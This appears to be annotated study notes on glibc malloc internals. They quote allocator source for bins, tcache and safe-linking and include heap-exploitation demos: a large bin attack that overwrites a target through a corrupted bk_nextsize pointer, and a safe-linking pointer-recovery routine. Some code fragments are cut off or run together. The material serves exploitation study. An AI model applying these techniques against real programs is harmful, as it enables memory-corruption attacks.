INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */ INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
structmalloc_chunk* fd;/* double links -- used only if free. */ structmalloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */ structmalloc_chunk* fd_nextsize;/* double links -- used only if free. */ structmalloc_chunk* bk_nextsize; };
/* The corresponding word size. */ #define SIZE_SZ (sizeof (INTERNAL_SIZE_T))
/* MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks. It must be a power of two at least 2 * SIZE_SZ, even on machines for which smaller alignments would suffice. It may be defined as larger than this though. Note however that code and data structures are optimized for the case of 8-byte alignment. */ #define MALLOC_ALIGNMENT (2 * SIZE_SZ < __alignof__ (long double) \ ? __alignof__ (long double) : 2 * SIZE_SZ)
/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained from a non-main arena. This is only set immediately before handing the chunk to the user, if necessary. */ #define NON_MAIN_ARENA 0x4
/* Check for chunk from main arena. */ #define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
/* Mark a chunk as not being on the main arena. */ #define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
/* have_fastchunks indicates that there are probably some fastbin chunks. It is set true on entering a chunk into any fastbin, and cleared early in malloc_consolidate. The value is approximate since it may be set when there are no fastbin chunks, or it may be clear even if there are fastbin chunks available. Given it's sole purpose is to reduce number of redundant calls to malloc_consolidate, it does not affect correctness. As a result we can safely use relaxed atomic accesses. */
/* Set if the fastbin chunks contain recently inserted free blocks. */ /* Note this is a bool but not all targets support atomics on booleans. */ int have_fastchunks;
/* Fastbins */ mfastbinptr fastbinsY[NFASTBINS];
/* Base of the topmost chunk -- not otherwise kept in a bin */ mchunkptr top;
/* The remainder from the most recent split of a small request */ mchunkptr last_remainder;
/* Normal bins packed as described above */ mchunkptr bins[NBINS * 2 - 2];
/* Bitmap of bins */ unsignedint binmap[BINMAPSIZE];
/* Linked list */ structmalloc_state *next;
/* Linked list for free arenas. Access to this field is serialized by free_list_lock in arena.c. */ structmalloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on the free list. Access to this field is serialized by free_list_lock in arena.c. */ INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */ INTERNAL_SIZE_T system_mem; INTERNAL_SIZE_T max_system_mem; };
To help compensate for the large number of bins, a one-level index structure is used for bin-by-bin searching. `binmap' is a bitvector recording whether bins are definitely empty so they can be skipped over during during traversals. The bits are NOT always cleared as soon as bins are empty, but instead only when they are noticed to be empty during traversal in malloc. */
/* Conservatively use 32 bits per map word, even if on 64bit system */ #define BINMAPSHIFT 5 #define BITSPERMAP (1U << BINMAPSHIFT) #define BINMAPSIZE (NBINS / BITSPERMAP)
An array of bin headers for free chunks. Each bin is doubly linked. The bins are approximately proportionally (log) spaced. There are a lot of these bins (128). This may look excessive, but works very well in practice. Most bins hold sizes that are unusual as malloc request sizes, but are more usual for fragments and consolidated sets of chunks, which is what these bins hold, so they can be found quickly. All procedures maintain the invariant that no consolidated chunk physically borders another one, so each chunk in a list is known to be preceeded and followed by either inuse chunks or the ends of memory.
Chunks in bins are kept in size order, with ties going to the approximately least recently used chunk. Ordering isn't needed for the small bins, which all contain the same-sized chunks, but facilitates best-fit allocation for larger chunks. These lists are just sequential. Keeping them in order almost never requires enough traversal to warrant using fancier ordered data structures.
Chunks of the same size are linked with the most recently freed at the front, and allocations are taken from the back. This results in LRU (FIFO) allocation order, which tends to give each chunk an equal opportunity to be consolidated with adjacent freed chunks, resulting in larger free chunks and less fragmentation.
To simplify use in double-linked lists, each bin header acts as a malloc_chunk. This avoids special-casing for headers. But to conserve space and improve locality, we allocate only the fd/bk pointers of bins, and then use repositioning tricks to treat these as the fields of a malloc_chunk*. */
typedefstructmalloc_chunk *mbinptr;
/* addressing -- note that bin_at(0) does not exist */ #define bin_at(m, i) \ (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2])) \ - offsetof (struct malloc_chunk, fd))
/* analog of ++bin */ #define next_bin(b) ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
/* Reminders about list directionality within bins */ #define first(b) ((b)->fd) #define last(b) ((b)->bk)
/* Indexing
Bins for sizes < 512 bytes contain chunks of all the same size, spaced 8 bytes apart. Larger bins are approximately logarithmically spaced:
64 bins of size 8 32 bins of size 64 16 bins of size 512 8 bins of size 4096 4 bins of size 32768 2 bins of size 262144 1 bin of size what's left
There is actually a little bit of slop in the numbers in bin_index for the sake of speed. This makes no difference elsewhere.
The bins top out around 1MB because we expect to service large requests via mmap.
Bin 0 does not exist. Bin 1 is the unordered list; if that would be a valid chunk size the small bins are bumped up one. */
The top-most available chunk (i.e., the one bordering the end of available memory) is treated specially. It is never included in any bin, is used only if no other chunk is available, and is released back to the system if it is very large (see M_TRIM_THRESHOLD). Because top initially points to its own bin with initial zero size, thus forcing extension on the first malloc request, we avoid having any special code in malloc to check whether it even exists yet. But we still need to do so when getting memory from system, so we make initial_top treat the bin as a legal but unusable chunk during the interval between initialization and the first call to sysmalloc. (This is somewhat delicate, since it relies on the 2 preceding words to be zero during this interval as well.) */
/* Conveniently, the unsorted bin can be used as dummy top on first call */ #define initial_top(M) (unsorted_chunks (M))
unsorted bin
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
/* Unsorted chunks
All remainders from chunk splits, as well as all returned chunks, are first placed in the "unsorted" bin. They are then placed in regular bins after malloc gives them ONE chance to be used before binning. So, basically, the unsorted_chunks list acts as a queue, with chunks being placed on it in free (and malloc_consolidate), and taken off (to be either used or placed in bins) in malloc.
The NON_MAIN_ARENA flag is never set for unsorted chunks, so it does not have to be taken into account in size comparisons. */
/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */ #define unsorted_chunks(M) (bin_at (M, 1))
#include<stdio.h> #include<stdlib.h> #include<assert.h> intmain(){ /*Disable IO buffering to prevent stream from interfering with heap*/ setvbuf(stdin,NULL,_IONBF,0); setvbuf(stdout,NULL,_IONBF,0); setvbuf(stderr,NULL,_IONBF,0);
printf("\n\n"); printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n"); printf("Check 1 : \n"); printf("> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n"); printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n"); printf("Check 2 : \n"); printf("> if (bck->fd != fwd)\n"); printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n"); printf("This prevents the traditional large bin attack\n"); printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n");
size_t target = 0; printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target); size_t *p1 = malloc(0x428); printf("First, we allocate a large chunk [p1] (%p)\n",p1-2); size_t *g1 = malloc(0x18); printf("And another chunk to prevent consolidate\n");
printf("\n");
size_t *p2 = malloc(0x418); printf("We also allocate a second large chunk [p2] (%p).\n",p2-2); printf("This chunk should be smaller than [p1] and belong to the same large bin.\n"); size_t *g2 = malloc(0x18); printf("Once again, allocate a guard chunk to prevent consolidate\n");
printf("\n");
free(p1); printf("Free the larger of the two --> [p1] (%p)\n",p1-2); size_t *g3 = malloc(0x438); printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n");
printf("\n");
free(p2); printf("Free the smaller of the two --> [p2] (%p)\n",p2-2); printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2); printf(" and one chunk in unsorted bin [p2] (%p)\n",p2-2);
printf("\n");
p1[3] = (size_t)((&target)-4); printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4);
printf("\n");
size_t *g4 = malloc(0x438); printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2); printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n"); printf(" the modified p1->bk_nextsize does not trigger any error\n"); printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd_nextsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2);
printf("\n");
printf("In our case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target); printf("Target (%p) : %p\n",&target,(size_t*)target);
/* Take a chunk off a bin list. */ staticvoid unlink_chunk(mstate av, mchunkptr p) { if (chunksize (p) != prev_size (next_chunk (p))) malloc_printerr ("corrupted size vs. prev_size");
mchunkptr fd = p->fd; mchunkptr bk = p->bk;
if (__builtin_expect (fd->bk != p || bk->fd != p, 0)) malloc_printerr ("corrupted double-linked list");
fd->bk = bk; bk->fd = fd; if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL) { if (p->fd_nextsize->bk_nextsize != p || p->bk_nextsize->fd_nextsize != p) malloc_printerr ("corrupted double-linked list (not small)");
An array of lists holding recently freed small chunks. Fastbins are not doubly linked. It is faster to single-link them, and since chunks are never removed from the middles of these lists, double linking is not necessary. Also, unlike regular bins, they are not even processed in FIFO order (they use faster LIFO) since ordering doesn't much matter in the transient contexts in which fastbins are normally used.
Chunks in fastbins keep their inuse bit set, so they cannot be consolidated with other free chunks. malloc_consolidate releases all chunks in fastbins and consolidates them with other free chunks. */
/* FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free() that triggers automatic consolidation of possibly-surrounding fastbin chunks. This is a heuristic, so the exact value should not matter too much. It is defined at half the default trim threshold as a compromise heuristic to only attempt consolidation if it is likely to lead to trimming. However, it is not dynamically tunable, since consolidation reduces fragmentation surrounding large chunks even if trimming is not used. */
#define FASTBIN_CONSOLIDATION_THRESHOLD (65536UL)
/* NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous regions. Otherwise, contiguity is exploited in merging together, when possible, results from consecutive MORECORE calls.
The initial value comes from MORECORE_CONTIGUOUS, but is changed dynamically if mmap is ever used as an sbrk substitute. */
/* Maximum size of memory handled in fastbins. */ static INTERNAL_SIZE_T global_max_fast;
/* Set value of max_fast. Use impossibly small value if 0. Precondition: there are no existing fastbin chunks in the main arena. Since do_check_malloc_state () checks this, we call malloc_consolidate () before changing max_fast. Note other arenas will leak their fast bin entries if max_fast is reduced. */
staticinline INTERNAL_SIZE_T get_max_fast(void) { /* Tell the GCC optimizers that global_max_fast is never larger than MAX_FAST_SIZE. This avoids out-of-bounds array accesses in _int_malloc after constant propagation of the size parameter. (The code never executes because malloc preserves the global_max_fast invariant, but the optimizers may not recognize this.) */ if (global_max_fast > MAX_FAST_SIZE) __builtin_unreachable (); return global_max_fast; }
#if USE_TCACHE /* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */ # define TCACHE_MAX_BINS 64 # define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)
/* Only used to pre-fill the tunables. */ # define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
/* When "x" is from chunksize(). */ # define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT) /* When "x" is a user-provided size. */ # define usize2tidx(x) csize2tidx (request2size (x))
/* With rounding and alignment, the bins are... idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit) idx 1 bytes 25..40 or 13..20 idx 2 bytes 41..56 or 21..28 etc. */
/* This is another arbitrary limit, which tunables can change. Each tcache bin will hold at most this number of chunks. */ # define TCACHE_FILL_COUNT 7
/* Maximum chunks in tcache bins for tunables. This value must fit the range of tcache->counts[] entries, else they may overflow. */ # define MAX_TCACHE_COUNT UINT16_MAX #endif
TCACHE_MAX_BINS = 64 定义了最多有 64 个大小类别(bin)
TCACHE_FILL_COUNT = 7 每个 bin 最多缓存 7 个 chunk(default)
MAX_TCACHE_COUNT 单个 bin 的最大计数上限(防止溢出)
MAX_TCACHE_SIZE tcache 能管理的最大 chunk 大小
并定义了chunk size <-> tcache bin 下标的转换,每个 bin 管一段连续大小区间,按MALLOC_ALIGNMENT(16 字节)对齐递增
size_t mchunk_prev_size; /* Size of previous chunk (if free). */ size_t mchunk_size; /* Size in bytes, including overhead. */
structmalloc_chunk* fd;/* double links -- used only if free. */ structmalloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */ structmalloc_chunk* fd_nextsize;/* double links -- used only if free. */ structmalloc_chunk* bk_nextsize; };
/* The corresponding word size. */ #define SIZE_SZ (sizeof (size_t))
/* The corresponding bit mask value. */ #define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
/* The smallest possible chunk */ #define MIN_CHUNK_SIZE (offsetof(struct malloc_chunk, fd_nextsize))
/* The smallest size we can malloc is an aligned minimal chunk */ #define MINSIZE \ (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
/* When "x" is from chunksize(). */ # define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size. */ # define usize2tidx(x) csize2tidx (request2size (x))
intmain() { unsignedlonglong req; unsignedlonglong tidx; fprintf(stderr, "This file doesn't demonstrate an attack, but calculates the tcache idx for a given chunk size.\n"); fprintf(stderr, "The basic formula is as follows:\n"); fprintf(stderr, "\tIDX = (CHUNKSIZE - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT\n"); fprintf(stderr, "\tOn a 64 bit system the current values are:\n"); fprintf(stderr, "\t\tMINSIZE: 0x%lx\n", MINSIZE); fprintf(stderr, "\t\tMALLOC_ALIGNMENT: 0x%lx\n", MALLOC_ALIGNMENT); fprintf(stderr, "\tSo we get the following equation:\n"); fprintf(stderr, "\tIDX = (CHUNKSIZE - 0x%lx) / 0x%lx\n\n", MINSIZE-MALLOC_ALIGNMENT+1, MALLOC_ALIGNMENT); fprintf(stderr, "BUT be AWARE that CHUNKSIZE is not the x in malloc(x)\n"); fprintf(stderr, "It is calculated as follows:\n"); fprintf(stderr, "\tIF x + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE(0x%lx) CHUNKSIZE = MINSIZE (0x%lx)\n", MINSIZE, MINSIZE); fprintf(stderr, "\tELSE: CHUNKSIZE = (x + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) \n"); fprintf(stderr, "\t=> CHUNKSIZE = (x + 0x%lx + 0x%lx) & ~0x%lx\n\n\n", SIZE_SZ, MALLOC_ALIGN_MASK, MALLOC_ALIGN_MASK); while(1) { fprintf(stderr, "[CTRL-C to exit] Please enter a size x (malloc(x)) in hex (e.g. 0x10): "); scanf("%llx", &req); tidx = usize2tidx(req); if (tidx > 63) { fprintf(stderr, "\nWARNING: NOT IN TCACHE RANGE!\n"); } fprintf(stderr, "\nTCache Idx: %llu\n", tidx); } return0; }
/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedefstructtcache_entry { structtcache_entry *next; /* This field exists to detect double frees. */ uintptr_t key; } tcache_entry;
/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */ typedefstructtcache_perthread_struct { uint16_t counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct;
/* Process-wide key to try and catch a double-free in the same thread. */ staticuintptr_t tcache_key;
/* The value of tcache_key does not really have to be a cryptographically secure random number. It only needs to be arbitrary enough so that it does not collide with values present in applications. If a collision does happen consistently enough, it could cause a degradation in performance since the entire list is checked to check if the block indeed has been freed the second time. The odds of this happening are exceedingly low though, about 1 in 2^wordsize. There is probably a higher chance of the performance degradation being due to a double free where the first free happened in a different thread; that's a case this check does not cover. */ staticvoid tcache_key_initialize(void) { if (__getrandom (&tcache_key, sizeof(tcache_key), GRND_NONBLOCK) != sizeof (tcache_key)) { tcache_key = random_bits (); #if __WORDSIZE == 64 tcache_key = (tcache_key << 32) | random_bits (); #endif } }
/* Caller must ensure that we know tc_idx is valid and there's room for more chunks. */ static __always_inline void tcache_put(mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will detect a double free. */ e->key = tcache_key;
/* Caller must ensure that we know tc_idx is valid and there's available chunks to remove. */ static __always_inline void * tcache_get(size_t tc_idx) { tcache_entry *e = tcache->entries[tc_idx]; if (__glibc_unlikely (!aligned_OK (e))) malloc_printerr ("malloc(): unaligned tcache chunk detected"); tcache->entries[tc_idx] = REVEAL_PTR (e->next); --(tcache->counts[tc_idx]); e->key = 0; return (void *) e; }
staticvoid tcache_thread_shutdown(void) { int i; tcache_perthread_struct *tcache_tmp = tcache;
tcache_shutting_down = true;
if (!tcache) return;
/* Disable the tcache and prevent it from being reinitialized. */ tcache = NULL;
/* Free all of the entries and the tcache itself back to the arena heap for coalescing. */ for (i = 0; i < TCACHE_MAX_BINS; ++i) { while (tcache_tmp->entries[i]) { tcache_entry *e = tcache_tmp->entries[i]; if (__glibc_unlikely (!aligned_OK (e))) malloc_printerr ("tcache_thread_shutdown(): " "unaligned tcache chunk detected"); tcache_tmp->entries[i] = REVEAL_PTR (e->next); __libc_free (e); } }
if (ar_ptr != NULL) __libc_lock_unlock (ar_ptr->mutex);
/* In a low memory situation, we may not be able to allocate memory - in which case, we just keep trying later. However, we typically do this very early, so either there is sufficient memory, or there isn't enough memory to do non-trivial allocations anyway. */ if (victim) { tcache = (tcache_perthread_struct *) victim; memset (tcache, 0, sizeof (tcache_perthread_struct)); }
/* Safe-Linking: Use randomness from ASLR (mmap_base) to protect single-linked lists of Fast-Bins and TCache. That is, mask the "next" pointers of the lists' chunks, and also perform allocation alignment checks on them. This mechanism reduces the risk of pointer hijacking, as was done with Safe-Unlinking in the double-linked lists of Small-Bins. It assumes a minimum page size of 4096 bytes (12 bits). Systems with larger pages provide less entropy, although the pointer mangling still works. */ #define PROTECT_PTR(pos, ptr) \ ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr))) #define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
longdecrypt(long cipher) { puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,"); puts("because of the 12bit sliding."); puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)"); long key = 0; long plain;
intmain() { /* * This technique demonstrates how to recover the original content from a poisoned * value because of the safe-linking mechanism. * The attack uses the fact that the first 12 bit of the plaintext (pointer) is known * and the key (ASLR slide) is the same to the pointer's leading bits. * As a result, as long as the chunk where the pointer is stored is at the same page * of the pointer itself, the value of the pointer can be fully recovered. * Otherwise, we can also recover the pointer with the page-offset between the storer * and the pointer. What we demonstrate here is a special case whose page-offset is 0. * For demonstrations of other more general cases, plz refer to * https://github.com/n132/Dec-Safe-Linking */
setbuf(stdin, NULL); setbuf(stdout, NULL);
// step 1: allocate chunks long *a = malloc(0x20); long *b = malloc(0x20); printf("First, we create chunk a @ %p and chunk b @ %p\n", a, b); malloc(0x10); puts("And then create a padding chunk to prevent consolidation.");
// step 2: free chunks puts("Now free chunk a and then free chunk b."); free(a); free(b); printf("Now the freelist is: [%p -> %p]\n", b, a); printf("Due to safe-linking, the value actually stored at b[0] is: %#lx\n", b[0]);
// step 3: recover the values puts("Now decrypt the poisoned value"); long plaintext = decrypt(b[0]);
/* There are several instances of this struct ("arenas") in this malloc. If you are adapting this malloc in a way that does NOT use a static or mmapped malloc_state, you MUST explicitly zero-fill it before using. This malloc relies on the property that malloc_state is initialized to all zeroes (as is true of C statics). */
/* Convert request size to internal form by adding SIZE_SZ bytes overhead plus possibly more to obtain necessary alignment and/or to obtain a size of at least MINSIZE, the smallest allocatable size. Also, checked_request2size returns false for request sizes that are so large that they wrap around zero when padded and aligned. */
if (!checked_request2size (bytes, &nb)) { __set_errno (ENOMEM); returnNULL; }
/* There are no usable arenas. Fall back to sysmalloc to get a chunk from mmap. */ if (__glibc_unlikely (av == NULL)) { void *p = sysmalloc (nb, av); if (p != NULL) alloc_perturb (p, bytes); return p; }
/* If the size qualifies as a fastbin, first check corresponding bin. This code is safe to execute even if av is not yet initialized, so we can try it without checking, which saves some time on this fast path. */
if (victim != NULL) { if (__glibc_unlikely (misaligned_chunk (victim))) malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");
if (SINGLE_THREAD_P) *fb = REVEAL_PTR (victim->fd); else REMOVE_FB (fb, pp, victim); if (__glibc_likely (victim != NULL)) { size_t victim_idx = fastbin_index (chunksize (victim)); if (__builtin_expect (victim_idx != idx, 0)) malloc_printerr ("malloc(): memory corruption (fast)"); check_remalloced_chunk (av, victim, nb); #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = *fb) != NULL) { if (__glibc_unlikely (misaligned_chunk (tc_victim))) malloc_printerr ("malloc(): unaligned fastbin chunk detected 3"); if (SINGLE_THREAD_P) *fb = REVEAL_PTR (tc_victim->fd); else { REMOVE_FB (fb, pp, tc_victim); if (__glibc_unlikely (tc_victim == NULL)) break; } tcache_put (tc_victim, tc_idx); } } #endif void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } } }
/* If a small request, check regular bin. Since these "smallbins" hold one size each, no searching within bins is necessary. (For a large request, we need to wait until unsorted chunks are processed to find best fit. But for small ones, fits are exact anyway, so we can check now, which is faster.) */
if (in_smallbin_range (nb)) { idx = smallbin_index (nb); bin = bin_at (av, idx);
if ((victim = last (bin)) != bin) { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) malloc_printerr ("malloc(): smallbin double linked list corrupted"); set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin;
if (av != &main_arena) set_non_main_arena (victim); check_malloced_chunk (av, victim, nb); #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) { if (tc_victim != 0) { bck = tc_victim->bk; set_inuse_bit_at_offset (tc_victim, nb); if (av != &main_arena) set_non_main_arena (tc_victim); bin->bk = bck; bck->fd = bin;
/* If this is a large request, consolidate fastbins before continuing. While it might look excessive to kill all fastbins before even seeing if there is space available, this avoids fragmentation problems normally associated with fastbins. Also, in practice, programs tend to have runs of either small or large requests, but less often mixtures, so consolidation is not invoked all that often in most programs. And the programs that it is called frequently in otherwise tend to fragment. */
/* Process recently freed or remaindered chunks, taking one only if it is exact fit, or, if this a small request, the chunk is remainder from the most recent non-exact fit. Place other traversed chunks in bins. Note that this step is the only place in any routine where chunks are placed in bins.
The outer loop here is needed because we might not realize until near the end of malloc that we should have consolidated, so must do so and retry. This happens at most once, and only when we would otherwise need to expand memory to service a "small" request. */
/* If a small request, try to use last remainder if it is the only chunk in unsorted bin. This helps promote locality for runs of consecutive small requests. This is the only exception to best-fit, and applies only when there is no exact fit for a small chunk. */
/* maintain large bins in sorted order */ if (fwd != bck) { /* Or with inuse bit to speed comparisons */ size |= PREV_INUSE; /* if smaller than smallest, bypass loop below */ assert (chunk_main_arena (bck->bk)); if ((unsignedlong) (size) < (unsignedlong) chunksize_nomask (bck->bk)) { fwd = bck; bck = bck->bk;
#if USE_TCACHE /* If we've processed as many chunks as we're allowed while filling the cache, return one of the cached ones. */ ++tcache_unsorted_count; if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit) { return tcache_get (tc_idx); } #endif
#define MAX_ITERS 10000 if (++iters >= MAX_ITERS) break; }
#if USE_TCACHE /* If all the small chunks we found ended up cached, return one now. */ if (return_cached) { return tcache_get (tc_idx); } #endif
/* If a large request, scan through the chunks of current bin in sorted order to find smallest that fits. Use the skip list for this. */
if (!in_smallbin_range (nb)) { bin = bin_at (av, idx);
/* skip scan if empty or largest chunk is too small */ if ((victim = first (bin)) != bin && (unsignedlong) chunksize_nomask (victim) >= (unsignedlong) (nb)) { victim = victim->bk_nextsize; while (((unsignedlong) (size = chunksize (victim)) < (unsignedlong) (nb))) victim = victim->bk_nextsize;
/* Avoid removing the first entry for a size so that the skip list does not have to be rerouted. */ if (victim != last (bin) && chunksize_nomask (victim) == chunksize_nomask (victim->fd)) victim = victim->fd;
/* Exhaust */ if (remainder_size < MINSIZE) { set_inuse_bit_at_offset (victim, size); if (av != &main_arena) set_non_main_arena (victim); } /* Split */ else { remainder = chunk_at_offset (victim, nb); /* We cannot assume the unsorted list is empty and therefore have to perform a complete insert here. */ bck = unsorted_chunks (av); fwd = bck->fd; if (__glibc_unlikely (fwd->bk != bck)) malloc_printerr ("malloc(): corrupted unsorted chunks"); remainder->bk = bck; remainder->fd = fwd; bck->fd = remainder; fwd->bk = remainder; if (!in_smallbin_range (remainder_size)) { remainder->fd_nextsize = NULL; remainder->bk_nextsize = NULL; } set_head (victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); set_foot (remainder, remainder_size); } check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } }
/* Search for a chunk by scanning bins, starting with next largest bin. This search is strictly by best-fit; i.e., the smallest (with ties going to approximately the least recently used) chunk that fits is selected.
The bitmap avoids needing to check that most blocks are nonempty. The particular case of skipping all bins during warm-up phases when no chunks have been returned yet is faster than it might look. */
++idx; bin = bin_at (av, idx); block = idx2block (idx); map = av->binmap[block]; bit = idx2bit (idx);
for (;; ) { /* Skip rest of block if there are no more set bits in this block. */ if (bit > map || bit == 0) { do { if (++block >= BINMAPSIZE) /* out of bins */ goto use_top; } while ((map = av->binmap[block]) == 0);
bin = bin_at (av, (block << BINMAPSHIFT)); bit = 1; }
/* Advance to bin with set bit. There must be one. */ while ((bit & map) == 0) { bin = next_bin (bin); bit <<= 1; assert (bit != 0); }
/* Inspect the bin. It is likely to be non-empty */ victim = last (bin);
/* If a false alarm (empty bin), clear the bit. */ if (victim == bin) { av->binmap[block] = map &= ~bit; /* Write through */ bin = next_bin (bin); bit <<= 1; }
else { size = chunksize (victim);
/* We know the first chunk in this bin is big enough to use. */ assert ((unsignedlong) (size) >= (unsignedlong) (nb));
remainder_size = size - nb;
/* unlink */ unlink_chunk (av, victim);
/* Exhaust */ if (remainder_size < MINSIZE) { set_inuse_bit_at_offset (victim, size); if (av != &main_arena) set_non_main_arena (victim); }
use_top: /* If large enough, split off the chunk bordering the end of memory (held in av->top). Note that this is in accord with the best-fit search rule. In effect, av->top is treated as larger (and thus less well fitting) than any other available chunk since it can be extended to be as large as necessary (up to system limitations).
We require that av->top always exists (i.e., has size >= MINSIZE) after initialization, so if it would otherwise be exhausted by current request, it is replenished. (The main reason for ensuring it exists is that we may need MINSIZE space to put in fenceposts in sysmalloc.) */
victim = av->top; size = chunksize (victim);
if (__glibc_unlikely (size > av->system_mem)) malloc_printerr ("malloc(): corrupted top size");
/* When we are using atomic ops to free fast chunks we can get here for all block sizes. */ elseif (atomic_load_relaxed (&av->have_fastchunks)) { malloc_consolidate (av); /* restore original bin index */ if (in_smallbin_range (nb)) idx = smallbin_index (nb); else idx = largebin_index (nb); }
staticvoid _int_free (mstate av, mchunkptr p, int have_lock) { INTERNAL_SIZE_T size; /* its size */ mfastbinptr *fb; /* associated fastbin */ mchunkptr nextchunk; /* next contiguous chunk */ INTERNAL_SIZE_T nextsize; /* its size */ int nextinuse; /* true if nextchunk is used */ INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */ mchunkptr bck; /* misc temp for linking */ mchunkptr fwd; /* misc temp for linking */
size = chunksize (p);
/* Little security check which won't hurt performance: the allocator never wrapps around at the end of the address space. Therefore we can exclude some size values which might appear here by accident or by "design" from some intruder. */ if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0) || __builtin_expect (misaligned_chunk (p), 0)) malloc_printerr ("free(): invalid pointer"); /* We know that each chunk is at least MINSIZE bytes in size or a multiple of MALLOC_ALIGNMENT. */ if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size))) malloc_printerr ("free(): invalid size");
check_inuse_chunk(av, p);
#if USE_TCACHE { size_t tc_idx = csize2tidx (size); if (tcache != NULL && tc_idx < mp_.tcache_bins) { /* Check to see if it's already in the tcache. */ tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting. */ if (__glibc_unlikely (e->key == tcache_key)) { tcache_entry *tmp; size_t cnt = 0; LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx); for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next), ++cnt) { if (cnt >= mp_.tcache_count) malloc_printerr ("free(): too many chunks detected in tcache"); if (__glibc_unlikely (!aligned_OK (tmp))) malloc_printerr ("free(): unaligned chunk detected in tcache 2"); if (tmp == e) malloc_printerr ("free(): double free detected in tcache 2"); /* If we get here, it was a coincidence. We've wasted a few cycles, but don't abort. */ } }
/* If eligible, place chunk on a fastbin so it can be found and used quickly in malloc. */
if ((unsignedlong)(size) <= (unsignedlong)(get_max_fast ())
#if TRIM_FASTBINS /* If TRIM_FASTBINS set, don't place chunks bordering top into fastbins */ && (chunk_at_offset(p, size) != av->top) #endif ) {
